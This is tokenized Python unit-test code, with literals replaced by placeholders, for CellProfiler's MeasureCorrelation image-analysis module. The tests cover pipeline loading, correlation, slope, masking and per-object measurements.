, labels ) <EOL> assert isinstance ( module , D . DisplayDataOnImage ) <EOL> module . color_or_text . value = D . CT_COLOR <EOL> module . color_map_scale_choice . value = D . CMS_MANUAL <EOL> module . color_map_scale . min = <NUM_LIT> <EOL> module . color_map_scale . max = <NUM_LIT> <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) </s>
<s> '''<STR_LIT>''' <EOL> import base64 <EOL> import unittest <EOL> import zlib <EOL> from StringIO import StringIO <EOL> import numpy as np <EOL> from cellprofiler . preferences import set_headless <EOL> set_headless ( ) <EOL> import cellprofiler . pipeline as cpp <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . cpimage as cpi <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . objects as cpo <EOL> import cellprofiler . workspace as cpw <EOL> import cellprofiler . modules . measurecorrelation as M <EOL> IMAGE1_NAME = '<STR_LIT>' <EOL> IMAGE2_NAME = '<STR_LIT>' <EOL> OBJECTS_NAME = '<STR_LIT>' <EOL> class TestMeasureCorrelation ( unittest . TestCase ) : <EOL> def make_workspace ( self , image1 , image2 , objects = None ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> image_set_list = cpi . ImageSetList ( ) <EOL> image_set = image_set_list . get_image_set ( <NUM_LIT:0> ) <EOL> for image_group , name , image in zip ( module . image_groups , <EOL> ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> ( image1 , image2 ) ) : <EOL> image_group . image_name . value = name <EOL> image_set . add ( name , image ) <EOL> object_set = cpo . ObjectSet ( ) <EOL> if objects is None : <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> else : <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> object_set . add_objects ( objects , OBJECTS_NAME ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> workspace = cpw . Workspace ( pipeline , <EOL> module , <EOL> image_set , <EOL> object_set , <EOL> cpmeas . Measurements ( ) , <EOL> image_set_list ) <EOL> return workspace , module <EOL> def test_01_01_load_matlab ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fd = StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_02_load_v1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fd = StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_03_load_v2 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> fd = StringIO ( data ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . thr , <NUM_LIT> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_04_load_v3 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> fd = StringIO ( data ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:1> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . thr , <NUM_LIT> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> all_object_measurement_formats = [ <EOL> M . F_CORRELATION_FORMAT , M . F_COSTES_FORMAT , M . F_K_FORMAT , <EOL> M . F_MANDERS_FORMAT , M . F_OVERLAP_FORMAT , M . F_RWC_FORMAT ] <EOL> all_image_measurement_formats = all_object_measurement_formats + [ <EOL> M . F_SLOPE_FORMAT ] <EOL> asymmetrical_measurement_formats = [ <EOL> M . F_COSTES_FORMAT , M . F_K_FORMAT , M . F_MANDERS_FORMAT , M . F_RWC_FORMAT ] <EOL> def test_02_01_get_categories ( self ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> def cat ( name ) : <EOL> return module . get_categories ( None , name ) == [ "<STR_LIT>" ] <EOL> self . assertTrue ( cat ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( cat ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_OBJECTS <EOL> self . assertFalse ( cat ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( cat ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> self . assertTrue ( cat ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( cat ( OBJECTS_NAME ) ) <EOL> def test_02_02_get_measurements ( self ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> def meas ( name ) : <EOL> ans = list ( module . get_measurements ( None , name , "<STR_LIT>" ) ) <EOL> ans . sort ( ) <EOL> if name == "<STR_LIT>" : <EOL> mf = self . all_image_measurement_formats <EOL> else : <EOL> mf = self . all_object_measurement_formats <EOL> expected = sorted ( [ _ . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] for _ in mf ] ) <EOL> return ans == expected <EOL> self . assertTrue ( meas ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( meas ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_OBJECTS <EOL> self . assertFalse ( meas ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( meas ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> self . assertTrue ( meas ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( meas ( OBJECTS_NAME ) ) <EOL> def test_02_03_get_measurement_images ( self ) : <EOL> '''<STR_LIT>''' <EOL> for iocase , names in ( <EOL> ( M . M_IMAGES , [ cpmeas . IMAGE ] ) , <EOL> ( M . M_OBJECTS , [ OBJECTS_NAME ] ) , <EOL> ( M . M_IMAGES_AND_OBJECTS , [ cpmeas . IMAGE , OBJECTS_NAME ] ) ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = iocase <EOL> for name , mfs in ( ( cpmeas . IMAGE , self . all_image_measurement_formats ) , <EOL> ( OBJECTS_NAME , self . all_object_measurement_formats ) ) : <EOL> if name not in names : <EOL> continue <EOL> for mf in mfs : <EOL> ftr = mf . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] <EOL> ans = module . get_measurement_images ( <EOL> None , name , "<STR_LIT>" , ftr ) <EOL> expected = [ "<STR_LIT>" % ( i1 , i2 ) for i1 , i2 in <EOL> ( ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> ( IMAGE2_NAME , IMAGE1_NAME ) ) ] <EOL> if mf in self . asymmetrical_measurement_formats : <EOL> self . assertTrue ( all ( [ e in ans for e in expected ] ) ) <EOL> else : <EOL> self . assertTrue ( any ( [ e in ans for e in expected ] ) ) <EOL> def test_02_04_01_get_measurement_columns_images ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_image_measurement_formats ] + [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_02_04_02_get_measurement_columns_objects ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_OBJECTS <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_object_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_02_04_03_get_measurement_columns_both ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_image_measurement_formats ] + [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_object_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_03_01_correlated ( self ) : <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> i1 = cpi . Image ( image ) <EOL> i2 = cpi . Image ( image ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( m . get_object_names ( ) [ <NUM_LIT:0> ] , cpmeas . IMAGE ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> self . assertEqual ( len ( columns ) , len ( features ) ) <EOL> for column in columns : <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in features ) <EOL> def test_03_02_anticorrelated ( self ) : <EOL> '''<STR_LIT>''' <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = <NUM_LIT:1> - image1 <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , - <NUM_LIT:1> ) <EOL> def test_04_01_slope ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) . astype ( np . float32 ) <EOL> image2 = image1 * <NUM_LIT> <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> slope = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> if mi [ <NUM_LIT:0> ] == "<STR_LIT>" % ( IMAGE1_NAME , IMAGE2_NAME ) : <EOL> self . assertAlmostEqual ( slope , <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> self . assertAlmostEqual ( slope , <NUM_LIT:2> ) <EOL> def test_05_01_crop ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> crop_mask = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> crop_mask [ <NUM_LIT:5> : <NUM_LIT:16> , <NUM_LIT:5> : <NUM_LIT:16> ] = True <EOL> i2 = cpi . Image ( image1 [ <NUM_LIT:5> : <NUM_LIT:16> , <NUM_LIT:5> : <NUM_LIT:16> ] , crop_mask = crop_mask ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> def test_05_02_mask ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> mask1 = np . ones ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> mask1 [ <NUM_LIT:5> : <NUM_LIT:8> , <NUM_LIT:8> : <NUM_LIT:12> ] = False <EOL> mask2 = np . ones ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> mask2 [ <NUM_LIT> : <NUM_LIT> , <NUM_LIT:2> : <NUM_LIT:5> ] = False <EOL> mask = mask1 & mask2 <EOL> image2 = image1 . copy ( ) <EOL> image2 [ ~ mask ] = <NUM_LIT:1> - image1 [ ~ mask ] <EOL> i1 = cpi . Image ( image1 , mask = mask1 ) <EOL> i2 = cpi . Image ( image2 , mask = mask2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> def test_06_01_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = image1 . copy ( ) <EOL> image2 [ labels == <NUM_LIT:2> ] = <NUM_LIT:1> - image1 [ labels == <NUM_LIT:2> ] <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( corr ) , <NUM_LIT:2> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( OBJECTS_NAME in m . get_object_names ( ) ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> object_features = m . get_feature_names ( OBJECTS_NAME ) <EOL> self . assertEqual ( len ( columns ) , len ( image_features ) + len ( object_features ) ) <EOL> for column in columns : <EOL> if column [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in image_features ) <EOL> else : <EOL> self . assertEqual ( column [ <NUM_LIT:0> ] , OBJECTS_NAME ) <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in object_features ) <EOL> def test_06_02_cropped_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> crop_mask = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> crop_mask [ <NUM_LIT:5> : <NUM_LIT:15> , <NUM_LIT:5> : <NUM_LIT:15> ] = True <EOL> i2 = cpi . Image ( image1 [ <NUM_LIT:5> : <NUM_LIT:15> , <NUM_LIT:5> : <NUM_LIT:15> ] , crop_mask = crop_mask ) <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> o . parent_image = i2 <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> def test_06_03_no_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = image1 . copy ( ) <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( corr ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( OBJECTS_NAME in m . get_object_names ( ) ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> object_features = m . get_feature_names ( OBJECTS_NAME ) <EOL> self . assertEqual ( len ( columns ) , len ( image_features ) + len ( object_features ) ) <EOL> for column in columns : <EOL> if column [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in image_features ) <EOL> else : <EOL> self . assertEqual ( column [ <NUM_LIT:0> ] , OBJECTS_NAME ) <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in object_features ) <EOL> def test_06_04_wrong_size ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:30> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i1 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> def test_06_05_last_object_masked ( self ) : <EOL> r = np . random . RandomState ( ) <EOL> r . seed ( <NUM_LIT> ) <EOL> image1 = r . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> image2 = r . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> labels = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , int ) <EOL> labels [ <NUM_LIT:3> : <NUM_LIT:8> , <NUM_LIT:3> : <NUM_LIT:8> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> ] = <NUM_LIT:2> <EOL> mask = labels != <NUM_LIT:2> <EOL> objects = cpo . Objects ( ) <EOL> objects . segmented = labels <EOL> for mask1 , mask2 in ( ( mask , None ) , ( None , mask ) , ( mask , mask ) ) : <EOL> workspace , module = self . make_workspace ( <EOL> cpi . Image ( image1 , mask = mask1 ) , <EOL> cpi . Image ( image2 , mask = mask2 ) , <EOL> objects ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> feature = M . F_CORRELATION_FORMAT % ( IMAGE1_NAME , IMAGE2_NAME ) <EOL> values = m [ OBJECTS_NAME , feature ] <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( np . isnan ( values [ <NUM_LIT:1> ] ) ) </s>
<s> </s>
